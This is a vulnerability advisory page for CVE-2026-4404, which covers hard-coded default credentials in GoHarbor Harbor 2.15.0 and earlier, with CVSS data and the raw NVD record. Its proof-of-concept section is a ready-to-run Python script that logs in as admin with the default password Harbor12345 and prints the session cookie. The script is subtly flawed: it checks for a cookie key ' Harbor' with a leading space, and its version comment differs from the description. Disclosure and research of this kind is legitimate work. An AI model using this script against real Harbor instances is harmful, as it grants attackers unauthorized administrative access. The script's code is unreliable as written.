Security Vulnerability Report
中文
CVE-2026-4404 CVSS 9.4 CRITICAL

CVE-2026-4404

Published: 2026-03-23 15:16:35
Last Modified: 2026-03-24 16:16:37
Source: [email protected]

Description

Use of hard coded credentials in GoHarbor Harbor version 2.15.0 and below, allows attackers to use the default password and gain access to the web UI.

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

GoHarbor Harbor <= 2.15.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_host = "https://<target_harbor_ip>" login_url = f"{target_host}/c/login" # Default hardcoded credentials for Harbor < 2.15.0 data = { "principal": "admin", "password": "Harbor12345" } headers = { "Content-Type": "application/x-www-form-urlencoded", "Accept": "application/json" } try: print(f"[*] Attempting to login to {target_host} using hardcoded credentials...") response = requests.post(login_url, data=data, headers=headers, verify=False, timeout=10) if response.status_code == 200: # Check if authorization cookie or token is present if " Harbor" in response.cookies.get_dict(): print("[+] Exploit successful! Logged in as admin.") print("[+] Session Cookie:", response.cookies.get_dict()) else: print("[-] Login failed. Credentials might have been changed.") else: print(f"[-] HTTP Error: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4404", "sourceIdentifier": "[email protected]", "published": "2026-03-23T15:16:35.403", "lastModified": "2026-03-24T16:16:36.507", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of hard coded credentials in GoHarbor Harbor version 2.15.0 and below, allows attackers to use the default password and gain access to the web UI."}, {"lang": "es", "value": "Uso de credenciales codificadas de forma rígida en GoHarbor Harbor versión 2.15.0 y anteriores, permite a los atacantes usar la contraseña predeterminada y obtener acceso a la interfaz de usuario web."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}, {"lang": "en", "value": "CWE-1393"}]}], "references": [{"url": "https://cwe.mitre.org/data/definitions/1393.html", "source": "[email protected]"}, {"url": "https://github.com/goharbor/harbor/issues/1937", "source": "[email protected]"}, {"url": "https://github.com/goharbor/harbor/pull/22751", "source": "[email protected]"}, {"url": "https://goharbor.io/docs/1.10/install-config/run-installer-script/#:~:text=If%20you%20did%20not%20change%20them%20in%20harbor.yml,%20the%20default%20administrator%20username%20and%20password%20are%20admin%20and%20Harbor12345", "source": "[email protected]"}, {"url": "https://www.kb.cert.org/vuls/id/577436", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.